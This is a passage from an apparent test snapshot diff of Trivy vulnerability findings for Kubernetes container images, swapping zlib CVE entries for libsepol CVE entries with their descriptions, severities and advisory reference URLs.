"https://access.redhat.com/errata/RHSA-2022:8291", - "https://access.redhat.com/security/cve/CVE-2022-37434", - "https://bugzilla.redhat.com/2116639", - "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", - "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", - "https://errata.almalinux.org/9/ALSA-2022-8291.html", - "https://errata.rockylinux.org/RLSA-2022:8291", - "https://github.com/curl/curl/issues/9271", - "https://github.com/ivd38/zlib_overflow", - "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", - "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", - "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", - "https://linux.oracle.com/cve/CVE-2022-37434.html", - "https://linux.oracle.com/errata/ELSA-2023-1095.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", - "https://security.netapp.com/advisory/ntap-20220901-0005/", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://support.apple.com/kb/HT213488", - "https://support.apple.com/kb/HT213489", - "https://support.apple.com/kb/HT213490", - "https://support.apple.com/kb/HT213491", - "https://support.apple.com/kb/HT213493", - "https://support.apple.com/kb/HT213494", - "https://ubuntu.com/security/notices/USN-5570-1", - "https://ubuntu.com/security/notices/USN-5570-2", - "https://ubuntu.com/security/notices/USN-5573-1", - "https://www.cve.org/CVERecord?id=CVE-2022-37434", - "https://www.debian.org/security/2022/dsa-5218", + "https://access.redhat.com/security/cve/CVE-2021-36084", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "https://linux.oracle.com/cve/CVE-2021-36084.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36084", ], }, "category": "Vulnerability", - "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", + "name": "libsepol: use-after-free in __cil_verify_classperms()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-37434", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/37", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/38", + "value": "https://avd.aquasec.com/nvd/cve-2021-36084", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + "value": "https://access.redhat.com/security/cve/CVE-2021-36084", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/42", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8291", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-37434", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2116639", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8291", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", }, { "type": "URL", - "value": "https://github.com/curl/curl/issues/9271", + "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", }, { "type": "URL", - "value": "https://github.com/ivd38/zlib_overflow", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", }, { "type": "URL", - "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "value": "https://ubuntu.com/security/notices/USN-5391-1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36085", + "installedVersion": "2.8-1", + "packageName": "libsepol1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-36085", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "https://linux.oracle.com/cve/CVE-2021-36085.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36085", + ], + }, + "category": "Vulnerability", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "libsepol: use-after-free in __cil_verify_classperms()", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-36085", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-36085", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213489", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213490", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213491", + "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213493", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213494", + "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-1", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5573-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "value": "https://ubuntu.com/security/notices/USN-5391-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5218", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.2.12-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2018-25032", - "installedVersion": "1.2.11-r3", - "packageName": "zlib", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36086", + "installedVersion": "2.8-1", + "packageName": "libsepol1", "references": [ - "http://seclists.org/fulldisclosure/2022/May/33", - "http://seclists.org/fulldisclosure/2022/May/35", - "http://seclists.org/fulldisclosure/2022/May/38", - "http://www.openwall.com/lists/oss-security/2022/03/25/2", - "http://www.openwall.com/lists/oss-security/2022/03/26/1", - "https://access.redhat.com/errata/RHSA-2022:8420", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", - "https://access.redhat.com/security/cve/CVE-2018-25032", - "https://bugzilla.redhat.com/2067945", - "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", - "https://errata.almalinux.org/9/ALSA-2022-8420.html", - "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", - "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", - "https://github.com/madler/zlib/issues/605", - "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", - "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", - "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", - "https://linux.oracle.com/cve/CVE-2018-25032.html", - "https://linux.oracle.com/errata/ELSA-2022-9565.html", - "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", - "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", - "https://security.gentoo.org/glsa/202210-42", - "https://security.netapp.com/advisory/ntap-20220526-0009/", - "https://security.netapp.com/advisory/ntap-20220729-0004/", - "https://support.apple.com/kb/HT213255", - "https://support.apple.com/kb/HT213256", - "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5355-1", - "https://ubuntu.com/security/notices/USN-5355-2", - "https://ubuntu.com/security/notices/USN-5359-1", - "https://ubuntu.com/security/notices/USN-5359-2", - "https://ubuntu.com/security/notices/USN-5739-1", - "https://www.cve.org/CVERecord?id=CVE-2018-25032", - "https://www.debian.org/security/2022/dsa-5111", - "https://www.openwall.com/lists/oss-security/2022/03/24/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/3", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://access.redhat.com/security/cve/CVE-2021-36086", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "https://linux.oracle.com/cve/CVE-2021-36086.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36086", ], }, "category": "Vulnerability", - "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", + "name": "use-after-free in cil_reset_classpermission()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-25032", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/33", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/35", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/38", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "value": "https://avd.aquasec.com/nvd/cve-2021-36086", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8420", + "value": "https://access.redhat.com/security/cve/CVE-2021-36086", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-25032", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2067945", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://github.com/madler/zlib/issues/605", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "value": "https://ubuntu.com/security/notices/USN-5391-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36087", + "installedVersion": "2.8-1", + "packageName": "libsepol1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-36087", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "https://linux.oracle.com/cve/CVE-2021-36087.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36087", + ], + }, + "category": "Vulnerability", + "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "value": "https://avd.aquasec.com/nvd/cve-2021-36087", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "value": "https://access.redhat.com/security/cve/CVE-2021-36087", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-42", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-1", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-2", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-1", + "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-2", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5739-1", + "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5111", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", }, { "type": "URL", - "value": 